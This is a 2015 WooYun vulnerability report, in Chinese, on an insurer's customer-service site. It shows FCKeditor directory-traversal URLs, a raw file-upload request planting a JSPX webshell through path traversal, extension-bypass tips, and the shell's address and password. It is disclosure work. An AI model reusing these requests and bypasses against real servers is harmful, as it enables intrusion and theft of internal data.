当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119657

漏洞标题:吉祥人寿某站漏洞打包(getshell)

相关厂商:吉祥人寿

漏洞作者: 路人甲

提交时间:2015-06-11 00:22

修复时间:2015-06-16 00:24

公开时间:2015-06-16 00:24

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

文件遍历+任意文件上传,大量内部资料外泄

详细说明:

问题产生于吉祥人寿的客服系统
http://ucstar.jxlife.com.cn:9090/login.jsp
ip:203.93.215.44

QQ截图20150610214924.jpg


该站被拿下,主站也将受到影响
问题出现在系统使用的编辑器fck
fck文件遍历

http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../


QQ截图20150610215119.jpg


http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../WEB-INF


QQ截图20150610215227.jpg

漏洞证明:

fck文件上传

http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector


QQ截图20150610215337.jpg


已经成马场了
这里上传需要注意,后缀必须要大写,可以上传jspx马,jsp马会跳转到登录页面
必须要跨目录传
http://ucstar.jxlife.com.cn:9090/js/wooyun.JSPX

POST http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/../../js HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/frmupload.html
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df29c2c509be
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 217
Host: ucstar.jxlife.com.cn:9090
Pragma: no-cache
Cookie: XSESSIONID=2z6flh927rzb
-----------------------------7df29c2c509be
Content-Disposition: form-data; name="NewFile"; filename="wooyun.JSPX"
Content-Type: application/octet-stream
wooyun test
-----------------------------7df29c2c509be--


一句话地址:http://ucstar.jxlife.com.cn:9090/js/wooyun1.JSPX
密码:023

QQ截图20150610220831.jpg


QQ截图20150610220934.jpg


QQ截图20150610221018.jpg


QQ截图20150610221104.jpg


一大波站点正在来袭

QQ截图20150610221356.jpg


服务器里随处可见

QQ截图20150610221555.jpg


大量资料存放于服务器根路径/image文件夹中

QQ截图20150610221852.jpg

修复方案:

正确配置fck

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-16 00:24

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-16 03:15 | 指尖上的故事 ( 普通白帽子 | Rank:347 漏洞数:77 | ...........)

    都这样了还忽略...然后在偷偷的修复

  2. 2015-06-26 08:28 | 吉祥人寿保险股份有限公司(乌云厂商)

    已经修复,请关闭。